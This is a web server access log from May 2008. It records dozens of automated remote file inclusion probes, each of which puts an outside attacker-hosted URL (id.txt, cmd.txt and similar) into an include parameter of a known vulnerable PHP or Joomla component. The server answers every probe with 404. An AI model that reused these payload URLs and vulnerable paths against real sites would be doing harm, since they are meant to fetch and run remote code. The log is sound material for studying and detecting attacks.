82.192.70.11 - - [04/May/2008:17:50:32 -0600] "GET /logs/access_log.20080420/homepage.php?sel=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.64"
82.192.70.11 - - [04/May/2008:17:50:32 -0600] "GET /homepage.php?sel=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.64"
82.192.70.11 - - [04/May/2008:17:50:33 -0600] "GET /logs/homepage.php?sel=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.64"
82.192.70.11 - - [04/May/2008:17:50:59 -0600] "GET /logs/access_log.20080330/homepage.php?sel=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.64"
83.175.248.213 - - [04/May/2008:17:51:27 -0600] "GET /logs/access_log.20080330//administrator/components/com_uhp/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
83.175.248.213 - - [04/May/2008:17:51:28 -0600] "GET //administrator/components/com_uhp/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
83.175.248.213 - - [04/May/2008:17:51:29 -0600] "GET /logs//administrator/components/com_uhp/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
85.214.33.45 - - [04/May/2008:17:52:38 -0600] "GET /logs//common/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.69"
85.214.33.45 - - [04/May/2008:17:52:38 -0600] "GET //common/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.69"
83.137.192.95 - - [04/May/2008:17:54:34 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 264 "-" "libwww-perl/5.800"
83.137.192.95 - - [04/May/2008:17:54:35 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 264 "-" "libwww-perl/5.800"
83.175.248.213 - - [04/May/2008:17:58:29 -0600] "GET /logs/error_log.20080330//xoopsgallery/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
195.12.53.176 - - [04/May/2008:17:58:38 -0600] "GET /logs/access_log.20080413//modules/agendax/addevent.inc.php?agendax_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:17:58:38 -0600] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:17:58:38 -0600] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:17:58:51 -0600] "GET /logs/access_log.20080413//modules/agendax/addevent.inc.php?agendax_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:17:58:51 -0600] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:17:58:52 -0600] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
205.234.130.198 - - [04/May/2008:18:00:22 -0600] "GET /index.php?pageurl=http://?? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
221.128.79.156 - - [04/May/2008:18:02:36 -0600] "GET /logs/http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? HTTP/1.1" 404 268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
221.128.79.156 - - [04/May/2008:18:02:36 -0600] "GET /http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
221.128.79.156 - - [04/May/2008:18:02:36 -0600] "GET /logs/http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
221.128.79.156 - - [04/May/2008:18:02:36 -0600] "GET /http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 270 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
189.22.150.131 - - [04/May/2008:18:03:11 -0600] "GET /logs/error_log.20080420//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
74.6.26.122 - - [04/May/2008:18:03:11 -0600] "GET /logs/?N=D HTTP/1.0" 200 2233 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
189.22.150.131 - - [04/May/2008:18:03:12 -0600] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
24.13.184.150 - - [04/May/2008:18:03:13 -0600] "GET /logs/access_log.2008020316%20http://musicroom.eclub.lv/body? HTTP/1.0" 404 251 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; .NET CLR 1.1.4322)"
24.13.184.150 - - [04/May/2008:18:03:21 -0600] "GET /logs/error_log.2008020316%20http://musicroom.eclub.lv/body? HTTP/1.0" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0)"
83.175.248.213 - - [04/May/2008:18:03:56 -0600] "GET /logs/administrator/components/com_comprofiler/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
83.175.248.213 - - [04/May/2008:18:03:57 -0600] "GET /administrator/components/com_comprofiler/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:04:54 -0600] "GET /logs/error_log.20080406/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:04:54 -0600] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:04:54 -0600] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:04:59 -0600] "GET /logs/error_log.20080406/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:04:59 -0600] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:04:59 -0600] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
213.226.248.111 - - [04/May/2008:18:05:02 -0600] "GET /logs/access_log.20080420/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.805"
213.226.248.111 - - [04/May/2008:18:05:02 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
213.226.248.111 - - [04/May/2008:18:05:02 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
65.98.95.186 - - [04/May/2008:18:05:07 -0600] "GET /logs/error_log.20080420//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
65.98.95.186 - - [04/May/2008:18:05:07 -0600] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.810"
65.98.95.186 - - [04/May/2008:18:05:07 -0600] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.810"
66.225.229.167 - - [04/May/2008:18:05:11 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
72.32.68.172 - - [04/May/2008:18:05:28 -0600] "GET /logs/access_log.20080406/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:05:49 -0600] "GET /logs/access_log.20080406/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
201.12.151.34 - - [04/May/2008:18:05:54 -0600] "GET /logs/access_log.20080413/admincp/auth/checklogin.php?cfgProgDir=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 258 "-" "libwww-perl/5.800"
201.12.151.34 - - [04/May/2008:18:05:54 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 233 "-" "libwww-perl/5.800"
201.12.151.34 - - [04/May/2008:18:05:55 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 238 "-" "libwww-perl/5.800"
85.19.150.85 - - [04/May/2008:18:07:12 -0600] "GET /logs/error_log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.805"
85.19.150.85 - - [04/May/2008:18:07:12 -0600] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
85.19.150.85 - - [04/May/2008:18:07:13 -0600] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
78.90.30.31 - - [04/May/2008:18:07:19 -0600] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.803"
78.90.30.31 - - [04/May/2008:18:07:37 -0600] "GET /logs/error_log.20080420//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
78.90.30.31 - - [04/May/2008:18:07:43 -0600] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.803"
211.172.232.90 - - [04/May/2008:18:09:39 -0600] "GET /logs/access_log.20080330//modules/My_eGallery/public/displayCategory.php?basepath=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 278 "-" "libwww-perl/5.811"
211.172.232.90 - - [04/May/2008:18:09:40 -0600] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.811"
211.172.232.90 - - [04/May/2008:18:09:41 -0600] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.811"
65.98.95.186 - - [04/May/2008:18:10:03 -0600] "GET /logs/access_log.20080420//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 298 "-" "libwww-perl/5.810"
72.32.68.172 - - [04/May/2008:18:10:41 -0600] "GET /logs/access_log.20080420/modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:10:41 -0600] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:10:41 -0600] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:10:44 -0600] "GET /logs/access_log.20080420/modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:10:44 -0600] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:10:44 -0600] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:11:34 -0600] "GET /logs/access_log.20080420/modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:11:34 -0600] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:11:34 -0600] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:11:45 -0600] "GET /logs/access_log.20080420/modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:11:45 -0600] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:11:45 -0600] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:12:28 -0600] "GET /logs/error_log.20080406/components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:12:28 -0600] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:12:29 -0600] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:12:50 -0600] "GET /logs/access_log.20080413/components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
83.137.192.95 - - [04/May/2008:18:13:31 -0600] "GET /logs/access_log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 280 "-" "libwww-perl/5.800"
83.137.192.95 - - [04/May/2008:18:13:31 -0600] "GET /logs/access_log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 280 "-" "libwww-perl/5.800"
83.137.192.95 - - [04/May/2008:18:13:31 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 269 "-" "libwww-perl/5.800"
83.137.192.95 - - [04/May/2008:18:13:31 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 269 "-" "libwww-perl/5.800"
205.234.130.198 - - [04/May/2008:18:14:20 -0600] "GET /logs/access_log.20080330/index.php?pageurl=http://?? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
205.234.130.198 - - [04/May/2008:18:14:20 -0600] "GET /logs/index.php?pageurl=http://?? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
205.234.130.198 - - [04/May/2008:18:14:49 -0600] "GET /logs/access_log.20080413/index.php?pageurl=http://?? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
78.90.30.31 - - [04/May/2008:18:14:50 -0600] "GET /logs/access_log.20080420//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
83.175.248.213 - - [04/May/2008:18:15:06 -0600] "GET /logs/error_log//administrator/components/com_uhp/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
85.19.150.85 - - [04/May/2008:18:15:26 -0600] "GET /logs/access_log.20080427//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
80.254.178.186 - - [04/May/2008:18:16:33 -0600] "GET //config.php?path_to_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
83.175.248.213 - - [04/May/2008:18:17:03 -0600] "GET /logs/access_log.20080427/administrator/components/com_comprofiler/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.79"
83.175.248.213 - - [04/May/2008:18:17:04 -0600] "GET /administrator/components/com_comprofiler/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
83.175.248.213 - - [04/May/2008:18:17:05 -0600] "GET /logs/administrator/components/com_comprofiler/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:17:10 -0600] "GET /logs/error_log.20080406/components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:17:10 -0600] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:17:10 -0600] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:17:34 -0600] "GET /logs/access_log.20080413/components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
208.101.26.99 - - [04/May/2008:18:18:12 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
208.101.26.99 - - [04/May/2008:18:18:15 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
208.101.26.99 - - [04/May/2008:18:18:19 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
221.128.79.156 - - [04/May/2008:18:18:25 -0600] "GET /http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
221.128.79.156 - - [04/May/2008:18:18:25 -0600] "GET /logs/http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? HTTP/1.1" 404 268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
221.128.79.156 - - [04/May/2008:18:18:29 -0600] "GET /http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 270 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
221.128.79.156 - - [04/May/2008:18:18:29 -0600] "GET /logs/http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
66.225.229.167 - - [04/May/2008:18:18:44 -0600] "GET /logs/error_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
66.225.229.167 - - [04/May/2008:18:18:44 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
66.225.229.167 - - [04/May/2008:18:19:41 -0600] "GET /logs/access_log.20080427//phpsecurityadmin/include/logout.php?PSA_PATH=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 267 "-" "libwww-perl/5.811"
83.175.248.213 - - [04/May/2008:18:19:48 -0600] "GET /logs/access_log.20080406/administrator/components/com_comprofiler/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.79"
80.254.178.186 - - [04/May/2008:18:22:03 -0600] "GET /logs/access_log.20080330//config.php?path_to_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
80.254.178.186 - - [04/May/2008:18:22:04 -0600] "GET //config.php?path_to_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
80.254.178.186 - - [04/May/2008:18:22:05 -0600] "GET /logs//config.php?path_to_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
80.93.62.69 - - [04/May/2008:18:22:40 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
80.93.62.69 - - [04/May/2008:18:22:40 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
208.101.26.99 - - [04/May/2008:18:22:45 -0600] "GET /logs/access_log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
208.101.26.99 - - [04/May/2008:18:22:45 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
208.101.26.99 - - [04/May/2008:18:22:45 -0600] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
208.101.26.99 - - [04/May/2008:18:22:46 -0600] "GET /logs/access_log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
208.101.26.99 - - [04/May/2008:18:22:46 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
208.101.26.99 - - [04/May/2008:18:22:46 -0600] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
208.101.26.99 - - [04/May/2008:18:22:46 -0600] "GET /logs/access_log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
208.101.26.99 - - [04/May/2008:18:22:46 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
208.101.26.99 - - [04/May/2008:18:22:46 -0600] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
200.62.54.120 - - [04/May/2008:18:23:13 -0600] "GET /logs/index.php?go1=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
200.62.54.120 - - [04/May/2008:18:23:13 -0600] "GET /index.php?go1=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
72.32.68.172 - - [04/May/2008:18:23:14 -0600] "GET /logs/error_log.20080330/modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
200.62.54.120 - - [04/May/2008:18:23:14 -0600] "GET /logs/index.php?go1=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
200.62.54.120 - - [04/May/2008:18:23:14 -0600] "GET /index.php?go1=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
64.38.19.130 - - [04/May/2008:18:24:47 -0600] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.811"
216.6.180.69 - - [04/May/2008:18:24:57 -0600] "GET /logs/error_log.20080330/modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:25:19 -0600] "GET /logs/access_log.20080413/index.php?pagina=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:25:19 -0600] "GET /index.php?pagina=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:25:19 -0600] "GET /logs/index.php?pagina=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
208.101.26.99 - - [04/May/2008:18:26:03 -0600] "GET /logs/access_log.20080420//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
72.32.68.172 - - [04/May/2008:18:26:12 -0600] "GET /logs/error_log/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
